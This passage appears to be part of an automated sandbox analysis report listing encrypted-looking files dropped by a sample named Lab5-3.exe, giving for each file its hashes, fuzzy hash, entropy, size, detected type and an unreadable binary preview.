                                                                                                          SHA-512:6A19E02546835A11A79A697631C40932196586FC5D2E174791B4CC9E15928E6353A55C4342D0C0ECEC3401B98AEF09DF4D3EE645F54E3FD7B2B27C5499FAEDDD
                                                                                                          Malicious:false
                                                                                                          Preview:...\,c&.':.Vk..c_......Pm.U...0....1....*.{.......b1H;J...._....A'Jm.i.....b....#,x55...:$o~.@.U..+h.0..]3r...#`..h...T.C...~....W;U..7c}j&y!......M...#.........N...=-kV..A.E0...*........pG..s.U...W.a.).Z.....Bss.E....RkS#.....o...0jUH.."..l..~0.........6......?5........a...2T....?..rB.x.^e.jC.o.c.[.&%$U...Hh.....).&.7.N...Ol1...H^..m..mq....1..>.....p...*....%..^...Pm.[O..?...F.VI..D.j.8.?.l.Q.?k...Nh.Z.......;...9..g..$..M..%....i.G2.K..G..D.L&.......kF..r..U..r......s..=....K/n.;.......j"...).. ...o.i5...e........6b(.....`.+}.R2K.l..#F$..d.8h..... 6...(....g..j..j)M.h.m....|....}..|-..p........#7.mY.I..C..@..9..dht.h./..E..............KV/...>HY...}..hY........,.Z5-.G6...c..b3..{........K..9........p.8..:....8.Ga:T7.K%U.M...H..[.F.z,`".eO..n5.y.>g..I...u.@p.t.(wg.*.2E.......w.$j..B.wxL..0@b..X..).!..o.2.KZ<.....>...@.?.t.x....Q...qm.P1....hT.h.....:Y...3.T..|.f#.C5..._...6............L6ov.</.d/#r1.".....A..At.D.{d.?-7.4..~......7..BS...*.\
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):12352
                                                                                                          Entropy (8bit):7.985308941168968
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:192:hxJQHsmcqaRlikj02n+8kiuc+BBeX+Y0PQQBt164xUOGAYyqo1JUbvu0Cb:/J1Rla2nnnuc+BB2Z0PHBtgOG2wbmtb
                                                                                                          MD5:F599C1FC7CB3C57AEA1ABA9EE938EF17
                                                                                                          SHA1:757F6B328FF0ECB8E2D30A7D9C0A299D4D3DAAFC
                                                                                                          SHA-256:F55B25AECCD4EE4CDE1BF15F13E5B18A41AD9084111706A85147C698B6CEC6F9
                                                                                                          SHA-512:F0D70018FD2BA0DA8F7B61AA5B649142D569C7A9AF6BD73C0288E8598CC1BDEF92303D4793068621A6D29C36BDA4F3931805362591AA1B327CAE5B2C1B2A1737
                                                                                                          Malicious:false
                                                                                                          Preview:/4.....v..........~.r..0.;S!..s|`@...+C..o.Ng..+.l.7.]...@y./.I..Q.>~.........8B.....4..j....t:.kw&!......i......Is...keK.[..CW...NN.5.g..O6>..C..{"N..4..X..6(-.#...I...S.L.......>.:....P......9z3u).;..p.|...3\.6.toq....[d7..7...).iW.v.[...1\.........q@eZ.24Fk.>.w...oo.!..`.....\>}%y..<.G<..ZX..C..l.e..t..ax...S.<.....{&_..O.G..l.d(.....vC.*...q...#...4..#.).'...\D.#9 .r..Y..w1*..0Kf.cy..qj.~"Q.....S.S...c.*[.n.U9u...{../.t..H.M4E....."....P.'........Ut8.....9.^(.BU.b.|...G...^w.~.j.H..l.."@....r=.o.AE.xNW .\`L....e.-.......QO.....1NO...#.*j/".4...Z|nKG.t4...[.K.g&y.....3......%.d#..g.P?}....s|.6......-.H#.....g`.W.~Iv.QDOQ.M8.F'..=....$..jPiTJ.=..(X...9K.h". !& 35....8...W..j.Hr.......%.a..?......Tx.~..RBS.QQ.+..5.6R.....~.........Iu...Qv......)..T. .ej...jx!n^/...W...@.e.._8...)`.UQ.;........+...u..e*..0..=.q.qk..(.)....JE.R^...w..[.!r.'.....]s7x..J.....(.e&.T..].....>Y.A>.).y.ca..W....X.CD%........}@"0...t-H.M.../n..).N...L..\...:.....\..
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):2704
                                                                                                          Entropy (8bit):7.9382069443705845
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:48:t9TCevc522MHjE7Hr6JV6LuSx0NHfUTid3hBaUoSGFcmeykEdEElU92i:fCN22WY6JV6SSx0mGx0uKeY2ElUJ
                                                                                                          MD5:2E5FD0A4F2BC2C7D2422A1A7D24119C2
                                                                                                          SHA1:B274A31E7E8045CFDF94F02CE2AE9A5E96EA4E65
                                                                                                          SHA-256:55258FDD494458C30F0D596B930D58328D902F003668B1F9CF5B4AF814D58DB8
                                                                                                          SHA-512:D35CBB34E82CCEFF07CB1D08A98530CE5B507D8D1BAA754AE37320586CA8C8CE51DFE3460DA7CA0D2919D9A8642A7D44B7FE71A79C3061C8BC9968B3F578D96C
                                                                                                          Malicious:false
                                                                                                          Preview:..,R.!wo.(=...:n...N.@....?..=D.+.+..&...{.......zP.......1._<.....%..f.$^Y?,^.t+....F..<F.6~...d?-..R. >L..N..^...Su.5,.L.n ..........V..K'@..<$.c.a...T......^g.`.W].A.QC...or\+.'\$]...*1lg.*..uG.].:Gv..s..07.Z.L.Y..r.%....K..ly[5...I\U76<CM..G3..1.U,B..]....u%.&..d4v......W.3.^X..K..x.'A...uj0.....XM4.0.F=4....;+8..O.gJ..... .Z...i.p..."...;MyP....b.D~......=c,..<.a"......Fs#....2..Y..)t...K1..`:....av.&.v............$............E....-.~J.?..._............7.[........[.K...bb?Q.T....w.....m.\.Z'[.2E.!...%.IFb...-3..........C.....v!K....'.f..0..#..v..P.... ....<.*.......d....w$.?\7r.q..../..5b.$..B...~6=R........l....v.... r2..*n.k.N.l.G><.E.?....L..$......"....~/.y..wxz.u.k...}.s..U.}.]5).b.&@....R]..g.@.\<....c24.W,<.4..y...`..%....j.d...Me....Ny..h.1l..:.O.y.A0...4.:.T}V..#...._G.A.;..m...&.eZ..y.K..2..c......?.3>.....U...|.i:..".\.I..v.v5.:.)=0.5...1(Q^....y..f........($.........Wd.R.9~2.mW.......L..[U`....5..w'__.:a.1...$.v^H......
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):3184
                                                                                                          Entropy (8bit):7.94153351697047
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:48:VANNv+Jdvr7rVMTy52A31hm5hrrHfUTid3hBaUoSGFcmeykEdEElU92i:qNNv+b32+5k5aGx0uKeY2ElUJ
                                                                                                          MD5:05ECB399F0712CFB1F918CB781B1957E
                                                                                                          SHA1:A31F3550D9B6BA67805BA2E126A3E431831A3554
                                                                                                          SHA-256:902CF7171FD6B8A03A786265922A2716282A15F1E5AE6207682013BE80443BFE
                                                                                                          SHA-512:7432F1C73E7EAE200B3B100DDADCFADE981495D3CD03A14B22BAFCC1B45EF231A0488065088CB1F96EDC27F069044DF125201BED0F6E109D706821738EB8053F
                                                                                                          Malicious:false
                                                                                                          Preview:.\M..f....O].Q.|...G.n.MT.{.L.!...H.:j.i.2po.7.S..Y^....Z.N....n.x...S...wW-.%...K[.n.....7.Y.@C.w].'.+.C.5.....,.GV..!..}>.n.4.....2@.^Wv.WN[6.^u....%..........+.-.~}.m.`.......@u.:*....h.a6.p.vT.....V.-...P...I.-..Q....U;."....c..HR<.D>.a7C.M.....,.k.M.Re.O..Su....3.......7&Z*81+..M.>d...P,..e.7p...5........,"W...w...g!...Ck.v_.s........jz..V.X....`......!.NPF.a.aB.).'T'i c...K.x.u<.8E].AU.%.^......,Y.....#..8..(.b.h.'...8.G..O`..>{a..+'...g2..O...w.......P_..`6...d._..9.._...]..}.5.u..9,..h.{<MC....<r........TL....8.1.....C7l).VL...[._...........O.e.. ...}.\.....U.......E.U..`....Q0D&..m.*J...X....o....RV.d....a|..R.d.#BP.G.G!^....uo.G.I#.........!.....])R...o..J..@...TG H^.3.....m8E.&.tprW.......4..Jx^..`.......`0..L..d.BRZ.j:=..f..].q..oW. ..F\t.sz..gj.u.{_....._t.P...a...\..<../.!...|~..id... 4....f$/g..vAF..4.V..vU.t.C...+.:y..R....TjZL.>us..J>4..`...0=]......./..)..WQ`=..RK.....q\......VM.m.....q.@.....c.$.....h.$.K.+1....m/!
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):1936
                                                                                                          Entropy (8bit):7.902938816388069
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:48:DPyxx9tYiIQHfUTid3hBaUoSGFcmeykEdEElU92i:OxV2Gx0uKeY2ElUJ
                                                                                                          MD5:DF9743E5AA4C6B93BAA5A13E1519F443
                                                                                                          SHA1:E8E990ADF197B52CEEE1A147E481ED3C22B7D2AB
                                                                                                          SHA-256:B2268A885102D53AB3D76737E479B0AE3F7AEF92F65D15B9374C6047B271FF7E
                                                                                                          SHA-512:0F925078C00859C71CC4044195B43E4AE0B003CB5C0888CBD6D279CA4F7155EA7E880B667F3A519064BF5A960F1D759E3DF67C2254C945D6F29600697560D7CE
                                                                                                          Malicious:false
                                                                                                          Preview:.VHq.*..XJ...I..ID/.x.L.!A...+E.(.6.M.#.z!W...9.=.Hh.2..A.x.0.}.@k.%..D.6Vs12.qY.....E.!..C0...R.|P$W...k?5.>B.^X......$)....I@U..\...a.......).....66l.........j..s...8}f....}q........n..DD..j...l...P.qS..fm.....65(0S/.R.l.F....R;.g.Rk/..`... ..+..\n...Z..i.0.#..j|w._.....E.~.O.;....'..{.6..H.D..i..%<A&c....b..K.|j.I....;F.>!Z.Q.....~-..%..'.........*.h..I.H..]..W.....a.\.~5.K.c.....;;.=H...i@................&...:w]..v..d..[71..*.>ooG..S.|......[P.=.x..K...[.8.#....8..4I..........M.$Kn2........m.D..p.,..6`F.t..)P.yX&...s.8..#.:K.Y.x..?f9.../v\.......].......'x.....>S.:..!N...X0.....[...1".A....?Jd...^.Q...rp....;....M....R...=(..(ch.s:........Q.V6g..>L.D.j.V.....;.$....h<P.p.....z.,r..8^P../.Hx.F...04.Ov.0&>.5P...t.,......y.....5..y3./eT..1...g....LQ.D.%Jn{...&.}...m.Y]da..........u.....r.D........<.F...`iY.+k...P..k.-.*.....67.I.,g.._Uk.h..Z........app.......B|.9.....&..H~..T.6..?....[.~....O_2....,..H0B.Y;..6..6.z"...E.;...Q.,./....
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):2160
                                                                                                          Entropy (8bit):7.907446800731771
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:48:/tZJzNUeJW/CnUILzHfUTid3hBaUoSGFcmeykEdEElU92i:/tHNVskbAGx0uKeY2ElUJ
                                                                                                          MD5:9F61EBFCE41482E94099B23D0CECA05B
                                                                                                          SHA1:10DD843C5A246905F8A3418AE205103842613FB6
                                                                                                          SHA-256:108AE303335914F8FDEBA60BD7466EAB5D638D0D8DF9CBD7E11B75012AB96AEE
                                                                                                          SHA-512:9922B9B3E5FF19DD1E0AEC6ADFACC4663D522875431465B7F86EA6D29CF1ADAC7AD01404F4F1F2284148760B751B2EF7041785775BF6CE11C234081A95419065
                                                                                                          Malicious:false
                                                                                                          Preview:3...xT{.i.z.?.|e...a........]`;BI..V_.........F...Fpy.>Tp>..:"...y...7=.:....%....c.......s...Qi..!.1..S$...9.....Gk-CT....\lC........3.{...z&.{...T..B..g.\..r.Cc[n7.+.S...@...;(lo).....T-=/....Q..%b.....z..G....5H!-M...0..:'%.....3..9W...XB.wb?.p.....V..&..eWp...$..q..={..z.u..(....a..`.`PQ....`.I.....En0.^{...C..D.X........36$..7;(>..)a..Khk8..G....^*Fs|.H...[(.g'.#.$m..J.kFh.H.J+g.(.a...S.{......a........:...h........(..2..?............c......../.W8..J...=.1.$SD...i.Z~.........R.b..a..8B_h.<4.....oGn.U..k..P.]....B..._...-.k.)..4...f.s......zk.#KmMp.......9pU..O ....[..C......[...HD..[2..f..|./3....i...F.(....&3.+........]V..'j....I.BE@.p....b=._..kQ.W...a........Q.e7aB..l.^...-.G..4.~bI...l.S..![.Dx.@....57..o0Y~E......Z..P. Q..E.....-./Y.r...I}z.pC....n.@S|H....Qe...z.....Q.(..KF6._......p+..'`..p..^.Q...rp....;....M....R...=(..(ch.s:........Q.V6g..>L.D.j.V.....;.$....h<P.p.....z.,r..8^P../.Hx.F...04.Ov.0&>.5P...t.,.....
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):2272
                                                                                                          Entropy (8bit):7.909983998130597
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:48:sQSLqbzZ6Y51GXD0HfUTid3hBaUoSGFcmeykEdEElU92i:hiW1QGx0uKeY2ElUJ
                                                                                                          MD5:F5050B958346AD4A3208A67355B1A7FF
                                                                                                          SHA1:F82C2698B934F0ECFCDB747F8AF73B74AAE27D12
                                                                                                          SHA-256:E5A51DC1798356509C27E3E083FA2FF43273CE2F655B2BD0C63CCFB6EABEC3D0
                                                                                                          SHA-512:1E2E03C1592C3A19036665B784548B61DFA8E11E9B65D20271F46B6F82FB8CAFA94E8A3F76B33F14745C1AD1F153338FC7140A65BA9829812796684F140589FB
                                                                                                          Malicious:false
                                                                                                          Preview:..).k.1mjZ.`.......!..Av1..../...J4..A.Z...&.c?.......|..*../..:..L.@5z.}.N..tM....>Q.ku.~j.k..c.:.|....Q.C .f......\....}..H.S.G.R..._.6J.1..I.).bvW..7.....BH..X.].m.Zc.&........?#.."..q..+:.7.G...).@I.....D...q.l.E.... S.s/.\.. +_$.....t*.u...C.Z./v'.........MA.F.7...L...;.w..(.....<.d...9.V.y'.g<8.|..j{H....GC.N.(.|>..9...Q..=. ..-..+..m.`92..mz,...j..1..5u2".+.u$j..00.H..-.;..(.~....h. *6^.:_^.KM.M..<r."Qljd.Z..Lm8..}...X..n.1..U...t..#....V.l....h.)'.1...#.1...`....b-..r&..8...A.KQ..).8... .e."{;..\.!/....j.D..#.9..".b..W..@.......>.[...?..|......W.......9KV..m....z..V..K..&8V..Q..]h..X.=.WGoX.T.|..)}.JtoL%.n4......8./x...cp...".J.A.b.v-...{.ur.E&?.:f2^..[Nk}m.....^..Y]uK.....7.....q....u............M.....],V.*X.|Q.....*.t.~.P?\M.}Y....KT...a..4...SA..q......ob.N....W@..r....)Ae....@kYN.....L#......H..[....p6-.?_..G..A..N..O...u....V..|.....4%o.K.j.....e.K)..aClm,.p.c..<....M'.@.I.T.X......XP..^.Q...rp....;....M
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:OpenPGP Secret Key
                                                                                                          Category:dropped
                                                                                                          Size (bytes):1968
                                                                                                          Entropy (8bit):7.907196746517023
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:48:QNqI4e78DL35YMHfUTid3hBaUoSGFcmeykEdEElU92i:wqI1SEGx0uKeY2ElUJ
                                                                                                          MD5:382DDF969C8EB9D4AD5A91F6A43CCAB8
                                                                                                          SHA1:59B70CBD151FF50CCE61A46389C0C08876B32E6F
                                                                                                          SHA-256:5033193F9851232EA3043FE8D1712CADCBEA8BF278742F3D633A00FC2D3E7305
                                                                                                          SHA-512:18BE0E5500384EA175CD34FC2E3FD905EDA7E2D98CA0B4904B225A0BE26FE483B77537754265F3C3F2F2CA2333A82CCC300D6AC1808BADB431A74328F25E56EA
                                                                                                          Malicious:false
                                                                                                          Preview:..Q.A.'{.W.Q5.4.x../8.9.;]Id....&p..kiiL..gviM.K?N..$...I.TM(...[.O"b..%nnG..]...9.Q..q.#d.2..KC..A-.fK.[N@..Q...BhO...a .f..0.+Il.j{2..(.^..D..e..+.V.Yx.l.{..P,.)....x....S.O..]9.z.R]0..X....X^..A...{..(.._....>1....9...|0 ..O#@.+^.f./...d..]..9|\.7.....(y......o&.L.t.i.3 .xj.3.........?.....%..X+?....l..p.pd..E..{PZ.i..>v...mD^...V....'.G..`.....c.E.."uA5~w.[.3.J.at.V..a..b...p1)4T.<\.2.....Q..+...<u..9..'.7.c....$.]A....rS........$..;...O..I.T..E.Z=}8Rz.s..[..G...o.8./....Oo.R.x..w}.@.K.8H...x...7%]..>...@.....|..t: ...xb.r.W..|.|.;.....#........$.wXWG.*.....}.1_Wb[........O.m\...e.7.(/ M..[.^"...S.......1..wR....7..c.u./...^.Q...rp....;....M....R...=(..(ch.s:........Q.V6g..>L.D.j.V.....;.$....h<P.p.....z.,r..8^P../.Hx.F...04.Ov.0&>.5P...t.,......y.....5..y3./eT..1...g....LQ.D.%Jn{...&.}...m.Y]da..........u.....r.D........<.F...`iY.+k...P..k.-.*.....67.I.,g.._Uk.h..Z........app.......B|.9.....&..H~..T.6..?....[.~....O_2....,..H0
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):2320
                                                                                                          Entropy (8bit):7.909538202375819
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:48:CnVlk65mcRyHTy37LzLypPPfKHfUTid3hBaUoSGFcmeykEdEElU92i:C0csm3nzLQVGx0uKeY2ElUJ
                                                                                                          MD5:DBB57BA9C5BCD3962835CD0F072798C0
                                                                                                          SHA1:DF9A77F09CEFDDFFCA78C753E716DCD3079CB92C
                                                                                                          SHA-256:AB9AB90C2B0CEFF9C8936C2146437D8F21EB30383033A9E67A5DE75587FB3D42
                                                                                                          SHA-512:759D822FFDEA24F5FFBB12095866284B38D6DC6ECA7D8723B6E7AF01A700E9FCC983F60B8BC34904DC51CA121138E6894505D85B9343736610E916D232908B63
                                                                                                          Malicious:false
                                                                                                          Preview:.H......WCd.r.f.........0..}... .v....J*..e.j.`."...erP...<....gF.{R^^5.k.5..l.M......Hm%x..N..e.......2H..>..t|.C.L=>...V....:P.#.3.Q.I?1N._..O)../pV...0]'v&......E........<...........r...v&......G.^R2v4.[>..~.....A...=i]zG....j.....}>.U...i`......|....j........E..........%=..5..R.[..O.e.b.]^..ee......Ov.W.=.-2..U.d.`....hc1I..c..CzDA...D.#SG..J..S.+.3+z.4jU*..-VO....n&.?..2?b..4...f*0....E..m{../...X9*2|..ki.c....7...J1yC..j..[.Y.a0..Q...4Y.v.J..N....@..!.Dl.."..D.F....d......e.'....Z%...vjf..8i..GE4..Y.....w.P&..>:.t..4V.o.n=o..%....._..v.^....FWb ....h..f..d.....l.p....^.6q)L...g..g.[.T.BX..."....(.b..-g..Y.... ..:.......f.i.Bu.r..P....^.r.0.*._.........p...9I...\p.M3..u.W.....Q.(....A.Zm...G...9AW......w....K.04....g4_HO....G...g.JO......[..t...l".jY..w...... "G...y.?.D..M..eM.......U..8....qrq.aL...kg.........)w...V..V..c...f:.+;...1O..v.4.=..j........"................E.L.e:..4..Y......Z../..J.X.j.,......[.T..-BG.x...(.
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:OpenPGP Public Key
                                                                                                          Category:dropped
                                                                                                          Size (bytes):2480
                                                                                                          Entropy (8bit):7.929430665382597
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:48:s6QibXwIByaQ4Nlz3M93UHfUTid3hBaUoSGFcmeykEdEElU92i:pNwIBY4NV8hTGx0uKeY2ElUJ
                                                                                                          MD5:0A2FB6A78DB3EB849412162A5641C83E
                                                                                                          SHA1:14AF3A8C7CFA4F75D57D51F66F2D19768B36CFFC
                                                                                                          SHA-256:209AE663CAFD79B27414DE153D008B102C3D0847DB7660A1EFDDFF2E1F7849A3
                                                                                                          SHA-512:7E2E160D996763696E1AFF6F93DD75AC3C3CFB1B060583F30E296806411F8AB8BA760FB92C11CB8D23BB328FFEF1BF9FE15FF797390587391C7D4AD1152ED21D
                                                                                                          Malicious:false
                                                                                                          Preview:.1.K.vS..G...Az.{.,D.*._~M..J.\6.id]..E.m...?$&.*N..c..[.+.....)AP...>.`e...L.....=...H5B..p.Sh.z.....ed.Y..(+U.....e.*.l%.H.......4....&.B.B........'..W..-.5..F$R.I.<...]S..`WS"..'x.C..AOxh......i............]..?,.;.n...@....L...V..XC..27..q..*0d..M....i..6....}.].Y*..*1....e......H.q.=.xY.0...)..,..c.<..i .5.Z..#..Y..zX.cYF~Q"Dn(c.P..?e.].Uu.[$..X.Z....J.....T .*.0...DS.._.@N&.._8.O].;k.[p...{...De...t{...wp.......z...'..^$>6.K.g$.t.hk.....1.EP.%.M....wCF.^.n. .E^.#.....1..xFD;!Za.s.,.Z.....0...*..+[......2'g.(..B.M...._......W......mM..y4....%.=h...>6).U..8.[. /...kT_*)...[.Ck."..Z~.!S7.l.1...|M..T<7...........M.C.N..._...D...!....u.!]... ../E.A.U.p.71.u<9..GM..D..F.....}...{.........t,...!./..R.9`x|..\.I.Cn....I..0y..lR.q!.....*1.6.....9...9....6.tNy.6s....~|.vt...=n..+y.......9n.}Z........c!~#....i"._y...........z>.:.+f..a.]..hX..s&.F..a.t...f!G..L5..4.a.H....p\..1$(hG..u ...A.[.~.#.1z..k.4Z...U"...~...C...$...\u.....'...*.l
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:MPEG-4 LOAS
                                                                                                          Category:dropped
                                                                                                          Size (bytes):2576
                                                                                                          Entropy (8bit):7.9313245753195645
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:48:ALWqG4d99MoekxR9pkt2f9kDzQ9owM2yHfUTid3hBaUoSGFcmeykEdEElU92i:A20DekxR9qYFkHv2tGx0uKeY2ElUJ
                                                                                                          MD5:0172BEE645B5EE0EE130D6F4EA3A5120
                                                                                                          SHA1:946C0E81404465CE86F619BB62D109CBC9FE59EC
                                                                                                          SHA-256:74979A587FF26AA9AF3D12EE15279F84F16273C808D5E0EC7BA3A47096D80B4C
                                                                                                          SHA-512:FFA4B94AE135CDB11D7E102D9F69BD020671941F3F6A475BA950DD18A7F650E44BA94F96AA217E691D6AB91F7A917A8373B97F8B0BD093796D722BFF69E8824F
                                                                                                          Malicious:false
                                                                                                          Preview:V..s<=.....3.Y.;.q........J....L'..!.-....#...{....n.....+..xn..},..`.Zdr...I....|.'....@K...?.k".#k.ob.Z&U..LN9.;,.3].3`...{...N:.JA....kF...qM.P..F...&.....]H..uO*.(..f .$......@3k.2..V]..&...c.. ~.W....,Lj...u.RW.G2.>..."....z..J..2.-.l.rV..[..(......$d.....l,..G.G...f5.......q..Zu.E0.[&....?..eI3...z8..)..|..w..l...;...4v!0.2.-.....;..2....VB8.-..Zg=.....V.._\.S...._.Uy.y..E..!.h.K....<.^..j.......7.......o.v.....mw..s.#.#.|.>.PI2..P..l..<.PM.B.....-3..(.B.T...8....>j...9.s..1.gT.t.....^.2..x.:......M?d.......aC...r|).).f^..c:.....=..0Q...?......@9...}..}>....n.?.../.^.p..C... ,..9..".?>e.B.o. ...........g..;....;b\.kx.v.K......[....U....k..[5^7.E0..c....t.B.{.RS....+..i.s.M.^.NZ....$g..I..0..i..Il..2..P.......@....f#...R...w..{..9.(qr..O.....~...Q...,.m".%....5.d....7..1.Z...e.I.7.T...I..,.rb.,.I..o.c..dl.....S8...h2.f!..z...k~....J..u...gy..A.....(E...3E..z...wM.n..nu.O'..,.F.I ..v.i......$..kf.!J......* .jVZx...&....``E..kE.M..A.=
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):2816
                                                                                                          Entropy (8bit):7.942713021039555
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:48:eV0e0ZbpZv7S10NttvF2hA08fU0drRBLIHfUTid3hBaUoSGFcmeykEdEElU92i:EsbjjbvF2hGfUGrR1vGx0uKeY2ElUJ
                                                                                                          MD5:F400CAB4CE4099CCBFDE06E03BF0ECC4
                                                                                                          SHA1:588B3DA2BC86D486182C6E2A58268EF8117C7CA6
                                                                                                          SHA-256:CE22F0901CBCEC7831BC65CDF6AED576AF2CEB072CB4EDF5C4F2747A9C4F2395
                                                                                                          SHA-512:40A7FC79DAF59A01918233EC996FB5A144756465445DF61DD7391F30205EBAF77EC735990AB481FC15B560E1BD7C6686B68CAC83BC5F38E689C259430A8387A5
                                                                                                          Malicious:false
                                                                                                          Preview:2...O..mO6N.&z.&z..x.J....._.5....SU.0t...h.'.S.hv......M.#......e.2BiK.?..}.(.@...!4..%.2...g.._v...>+EtO.*.`....t<..r$h....^..{U-hb.(jgn[.-..b .....[?...Q..w0.;)...+......]...j.!0x.{.38.#..W..-...mTzCI.9.S.....}.i..C~........b..P.`G.l..m$..7....B......^J....>3.y..uK,........'.yj.....O.J.@.+.*&..E.dkV.Nj..D..Q..uj...VT{.;........W....=i{..+.x....v..u....M....!l...>1....0 ..... 9...O...n<(...8...v..E~\7.....4q.........Lh..w..q6..e.%...3*....L^AL,..g|.......zA...'......|p...wU..!O&..A....~.K..p...$.S(.Tt..s..ad.oiX<.......k.!<;'j.;y..mH]...'.;..bbI....9.}c......,....e..D....}T^%F.x.-........].....E...../|wd.2GG........M..nE..b.....G..<.."O...A.......%.....!^V.".......<.=.N~Qi.B..n....iJH.P.g..:..Z...G....QQ..DT%....h.>La(?n.Lez.M..s]....o..n990.",.$.c.....;......y.......B[..f.c.....u&K.t..%c.q...* 8.s.........%.1p.w$.P.$hN.B....:.W...R.Z.......A..J....k....M-Q.}.l9&...A....[.G!BE..b_~.B.Sq. .:|"....t......!...^...@Yo.E...#..r.1b.5.Gj.*
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):2544
                                                                                                          Entropy (8bit):7.920208049045442
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:48:3AFoqHuP1STCsjknKXfFpZDjHnEJ9K4WIaHfUTid3hBaUoSGFcmeykEdEElU92i:3rpEvknQfFpZvydV1Gx0uKeY2ElUJ
                                                                                                          MD5:6FCF6BEEA721FB23A626FFD06FF12A51
                                                                                                          SHA1:890812ADDBE3C3F663B9822686CA834E1CB010FA
                                                                                                          SHA-256:577D620C04F4E4B1CEC28FB2DDDF893876A598DE50A9560B59B9114223FB32D5
                                                                                                          SHA-512:1EE98A76F5E90C5B8CF6F6440E3667CA2765F1B7482FB88FC71AC5B2F9404E8C4321364D9579A3353FB10FA83B74342FEAC638F75A96F2672A8FF300D2B3A162
                                                                                                          Malicious:false
                                                                                                          Preview:...-u.'...E8.%...,.T.ZC.QA.......bM...ju ..=H..r.Po.e.%.l..2,..O.7c.4...F..iM;...`..._...4J.*.D}.%.f...6..f.\....u.....?.zfj...f..f.xM3.z.g....0..@._Uk.......[..6....%.u.2:E*&.t).b.;'....1.&.4..e.0.s.L......4......\.$.2W@l+.]x..(./[......#W.Q..*H....9.....i..S..2...X...`<..|.-in.,..0._...O.Un5xE(.0.(4M.:....dT......T.D.$.M.W.n.TY{...GV.e..X`.%..**.2/r.....".....`.G.=`.....fP........t...Du.2.*M....A.J..&@......4..[..........7..c..,.&:~a..J.$./..}....|._...8.yIR..E..c._`.|.P.......^. ~..,d.QLv.j...wc..8.y.b.F]....P.../..)...n...N....5j0.N].'..t?D...2_.'.V.qF.d,H....$.ou...Z.V`.u-..s.,....?c.*n.""1........<"....f..l.>.s.L.5.....%v...&..)..yS.....v8\S.......hi/..|.264h...1..x.?........0^.....z*`.D.+r...r..-B....8P..7.l....#..%.}.o.B..U.....D....M......f..L...b....",..W.....?]....A.ZA.!xi#).<G....9l.`"X...bVG.R.m..T..I.../...r..[Id..._.....H.V..B...`.>..u.@;.#...Y...A-q.6Z...W.H.t.7$.'......@ ..?..pG..q9...,Fq...*.J..P[..`].4.......)>.M84b.
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):2304
                                                                                                          Entropy (8bit):7.921066341163649
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:48:FjW+BcpqxCCAr0ROkntbK93sYBHfUTid3hBaUoSGFcmeykEdEElU92i:FjW+Bo3CK04ktbmUGx0uKeY2ElUJ
                                                                                                          MD5:5ABD3CA9879D3A76D4EFE0DCE6BD2424
                                                                                                          SHA1:B9C460D3A7548D1629A84C90A14F703A36DB7F64
                                                                                                          SHA-256:03D2780A9131AFF986C12B8992FDC64762E8E0B27C7F9F963E119765C6982982
                                                                                                          SHA-512:578CA249E3E7B2CD288D9EFDBF96BEFB88AAD9EC3942EF4F6085316C21D3FE5CEF9A6625A7E6EAC391282C9957F4CC8C7864853969B1988A767FA45C0523BD6F
                                                                                                          Malicious:false
